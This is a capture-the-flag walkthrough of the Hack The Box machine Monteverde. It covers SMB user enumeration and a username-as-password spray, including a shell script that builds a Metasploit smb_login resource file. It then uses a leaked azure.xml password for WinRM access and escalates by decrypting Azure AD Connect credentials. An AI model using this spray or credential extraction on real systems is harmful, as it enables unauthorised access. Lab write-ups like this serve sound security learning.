
Monteverde Writeup

Reconnaissance

Let's start off with an Nmap scan of the target, 10.10.10.172, using:
-sV: probe open ports to determine service/version info
-sC: equivalent to --script=default


The scan shows this machine has no web server, SSH or anything like that. It does have SMB, which we can enumerate first.
We run enum4linux 10.10.10.172 to see if we can get a list of users, groups and any other information we can use.


From the results we get a list of users along with groups, but for now we will focus only on the users.
Take the list of users and put them into a file, in my case users.txt.
We are going to use this to brute-force the SMB login.
Set the relevant options and use users.txt as both the user list and the password list, so every username is tried as a password.
I do this because I usually test for weak passwords such as the username itself as an easy win.


Foothold

You can try the usernames and passwords manually, but I tend to automate things for quicker results.
Let's start up msfconsole and use the smb_login module to run through the list.
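As an added example that is not part of the original writeup, the script below automates the two steps above: it pulls the usernames out of enum4linux's output into users.txt and writes an msfconsole resource script that feeds that file to smb_login as both USER_FILE and PASS_FILE, exactly the setup used interactively here. The enum4linux fragment embedded in the script is constructed for the example and the account names in it are hypothetical, not the box's users.

```shell
#!/bin/sh
# Added example, not from the original post: build users.txt from enum4linux
# output and generate a Metasploit resource script for the username-as-password
# spray with auxiliary/scanner/smb/smb_login.
set -eu
export LC_ALL=C

# Constructed fragment of enum4linux output. The "user:[name] rid:[...]" lines
# come from its enumdomusers step; the other lines are there to show that they
# are ignored, and the duplicate line shows de-duplication. Names are hypothetical.
ENUM_SAMPLE=' ============================
|    Users on 10.10.10.172    |
 ============================
index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator    Name: (null)    Desc: Built-in account
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[svc_backup] rid:[0x641]
user:[svc_backup] rid:[0x641]
group:[Domain Admins] rid:[0x200]'

# extract_users: read enum4linux output on stdin, print one unique username per line.
extract_users() {
    sed -n 's/^user:\[\([^]]*\)\] rid:\[.*$/\1/p' | sort -u
}

# make_rc USER_FILE RHOSTS: print an msfconsole resource script that sprays the
# list against SMB using the same file as both USER_FILE and PASS_FILE, as in
# the writeup. smb_login's USER_AS_PASS option gives the same result with N
# attempts instead of N*N; STOP_ON_SUCCESS false keeps going after the first hit.
make_rc() {
    user_file=$1
    rhosts=$2
    cat <<EOF
use auxiliary/scanner/smb/smb_login
set RHOSTS $rhosts
set USER_FILE $user_file
set PASS_FILE $user_file
set STOP_ON_SUCCESS false
set VERBOSE false
run
exit
EOF
}

# Stand-alone usage: write users.txt and spray.rc, then run
#   msfconsole -q -r spray.rc
printf '%s\n' "$ENUM_SAMPLE" | extract_users > users.txt
make_rc users.txt 10.10.10.172 > spray.rc
```

In practice you would pipe the real enum4linux output into extract_users (enum4linux 10.10.10.172 | extract_users > users.txt) and then run the generated spray.rc; with VERBOSE false only successful logins are printed, which is what we want from a first pass.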


We find a hit: a valid username and password pair.
Let's use it with smbclient to see which shares we can access and find any files or information we can use to enumerate further.


We grab the azure.xml file and find the following juicy information in it.


We find a password. Let's use it for the user mhope to log into the machine via evil-winrm.


What do you know, we are logged in, and browsing to the Desktop folder gives us the user flag!

Exploit to Administrator

Let's browse the user's folders and see what we can find.


There is a .Azure folder, which could be a hint as to what to look for.
Checking the user's account shows which groups he belongs to, and from there we can see what that group has access to.


Let's check the system for any Azure applications. We find that Azure AD Sync is installed in the following location.


Now it's time to look for articles on how this service can be abused for escalation.


I am not going to explain what happens here; go read it for yourself:
Azure AD Connect for Red Teamers
On that page we find the POC, which connects to the ADSync SQL LocalDB, grabs the encrypted credentials, decrypts them and gives us the gold!
First download the file or copy its contents into a file, e.g. azure_decrypt.ps1.
It didn't work at first, but after some troubleshooting and reading up on connecting to SQL via the CLI, I had to change one of the script's SQL connection parameters to get it working 100%. The lesson is to check how the ADSync database is actually hosted on the target before running the script.


Once the changes are done, connect back to the machine, upload the PowerShell script, change directory to the Azure AD Sync directory and run the script.


We should now have the administrator credentials, which we can use to log into the machine via evil-winrm and grab the root flag!


This post is licensed under 0x3n0 by the author.
